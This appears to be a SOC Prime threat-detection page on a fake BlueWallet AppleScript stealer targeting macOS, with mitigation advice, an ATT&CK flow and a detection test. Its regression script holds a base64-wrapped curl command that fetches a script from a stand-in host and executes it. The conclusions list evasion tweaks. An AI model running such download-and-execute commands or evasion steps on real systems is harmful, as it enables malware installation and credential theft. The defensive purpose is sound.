SOC Prime Bias: Medium

04 Jun 2026 14:59 UTC
newspaper icon Malwarebytes

Fake BlueWallet steals passwords, accounts, and crypto from Macs

Author Photo
SOC Prime Team linkedin icon Follow
Fake BlueWallet steals passwords, accounts, and crypto from Macs
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

Attackers are using a fake BlueWallet download page to distribute a malicious AppleScript file targeting macOS users. Once executed, the script launches a Base64-encoded shell command that retrieves a second-stage payload from a remote server. That payload steals browser data, cryptocurrency wallet files, password manager databases, cloud credentials, and clipboard contents, then sends the collected information to the attackers through a Telegram bot.

Investigation

The first stage is a small AppleScript file named BlueWallet Installer.applescript that decodes and runs a curl command to fetch a hidden script called /tmp/.sysupd.sh. The second-stage script creates a randomized working directory, gathers data from multiple applications, and uses a Telegram bot for both command-and-control and exfiltration. Persistence is established through a LaunchAgent plist dropped into the user’s ~/Library/LaunchAgents directory.

Mitigation

Users should avoid opening unknown AppleScript files and carefully verify the legitimacy of cryptocurrency wallet download pages before installing anything. Organizations should restrict script execution from untrusted sources, monitor for hidden files created in /tmp, and watch for suspicious LaunchAgent entries. Outbound connections to known malicious infrastructure should be blocked. If compromise is suspected, passwords should be changed immediately and cryptocurrency seed phrases rotated.

Response

If infection is suspected, disconnect the affected macOS system from the network, collect forensic artifacts such as the LaunchAgent plist and /tmp/.sysupd.sh, and remove all malicious files. Reset any compromised credentials, revoke exposed SSH and cloud keys, and review Telegram-related activity for signs of continued attacker control. If full cleanup cannot be confidently confirmed, reinstall macOS from a trusted source.

"graph TB %% Class definitions classDef technique fill:#99ccff classDef artifact fill:#ffdd99 %% Node definitions drive_by["<b>Technique</b> – T1189 Drive-by Compromise<br/><b>Description</b>: Malicious website causes the victim to download a payload."] class drive_by technique user_exec["<b>Technique</b> – T1204.002 User Execution<br/><b>Description</b>: Victim runs a downloaded AppleScript file."] class user_exec technique applescript_interp["<b>Technique</b> – T1059.002 Command and Scripting Interpreter: AppleScript<br/><b>Description</b>: AppleScript runs a base64u2011encoded curl command."] class applescript_interp technique obfuscation["<b>Technique</b> – T1027.008 Obfuscated Files or Information<br/><b>Description</b>: Payload strings are encoded with base64 and XOR."] class obfuscation technique masquerade["<b>Technique</b> – T1036.003 Masquerading<br/><b>Description</b>: Files named u201cBlueWallet Installer.applescriptu201d and u201c.sysupd.shu201d to appear legitimate."] class masquerade technique launchctl["<b>Technique</b> – T1569.001 System Services: Launchctl<br/><b>Description</b>: Launchctl executes a secondu2011stage script."] class launchctl technique persistence["<b>Technique</b> – T1543.001 Persistence: Launch Agent<br/><b>Description</b>: Plist placed in ~/Library/LaunchAgents for autou2011start."] class persistence technique tcc_manip["<b>Technique</b> – T1548.006 Abuse Elevation Control Mechanism: TCC Manipulation<br/><b>Description</b>: Fake System Preferences dialog to obtain user consent."] class tcc_manip technique gui_capture["<b>Technique</b> – T1056.002 Input Capture: GUI<br/><b>Description</b>: Captures entered macOS password."] class gui_capture technique browser_collect["<b>Technique</b> – T1217 Collection: Browser Information Discovery<br/><b>Description</b>: Harvests browser data such as cookies and history."] class browser_collect technique clipboard_collect["<b>Technique</b> – T1115 Collection: Clipboard Data<br/><b>Description</b>: Replaces cryptocurrency addresses on the clipboard."] class clipboard_collect technique host_info["<b>Technique</b> – T1592.002 Gather Victim Host Information: Software<br/><b>Description</b>: Enumerates wallets, password managers and cloud credentials."] class host_info technique %% Connections drive_by –>|leads_to| user_exec user_exec –>|leads_to| applescript_interp applescript_interp –>|creates| obfuscation applescript_interp –>|creates| masquerade obfuscation –>|enables| launchctl launchctl –>|establishes| persistence persistence –>|triggers| tcc_manip tcc_manip –>|captures| gui_capture launchctl –>|collects| browser_collect launchctl –>|collects| clipboard_collect launchctl –>|collects| host_info "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An attacker crafts a malicious AppleScript that embeds a base64‑encoded payload. The payload, once decoded, downloads a secondary script (/tmp/.sysupd.sh) from a remote C2 server and executes it. The attacker launches this AppleScript via Script Editor (or osascript), leveraging the legitimate macOS “one‑line base64 do shell script” pattern that the rule monitors.

  • Regression Test Script:

    #!/bin/bash
# -------------------------------------------------
# Simulate Fake BlueWallet AppleScript execution
# -------------------------------------------------

# 1. Build the malicious base64 payload
#    The payload: curl -s http://malicious.example.com/payload.sh -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh
MALICIOUS_PAYLOAD='curl -s http://malicious.example.com/payload.sh -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh'
B64_PAYLOAD=$(printf "%s" "$MALICIOUS_PAYLOAD" | base64)

# 2. Execute via Script Editor (AppleScript)
osascript -e "do shell script "echo $B64_PAYLOAD | base64 -d > /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh""

# End of script

  • Cleanup Commands:

    #!/bin/bash
# Remove the malicious script and any residual artifacts
rm -f /tmp/.sysupd.sh
# Optionally clear AppleScript history (not required for detection)

Post‑Execution Verification

  1. Alert Confirmation: Query the SIEM for alerts generated by the rule ID 4294bac4-37cf-434e-ba7d-18910d23b830. Example KQL:

    SecurityAlert
| where AlertName contains "Fake BlueWallet Malware Execution"
| where Severity == "High"
| project TimeGenerated, Computer, AlertName, Description

  2. Evasion Test: Re‑run the Regression Test Script after renaming the temp file to /tmp/.sysupd_alt.sh. Verify that no alert is generated, confirming the rule’s dependence on the literal path.

Conclusions

  • The detection rule correctly identifies the exact command‑line pattern it was written for.
  • Its narrow focus makes it easily bypassable by simple evasion techniques (file‑name changes, separating the base64 payload, using osascript directly).
  • Enhancements such as fuzzy matching for base64‑decode patterns, monitoring any script written to /tmp with executable permissions, and correlating network download activity will improve coverage.

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free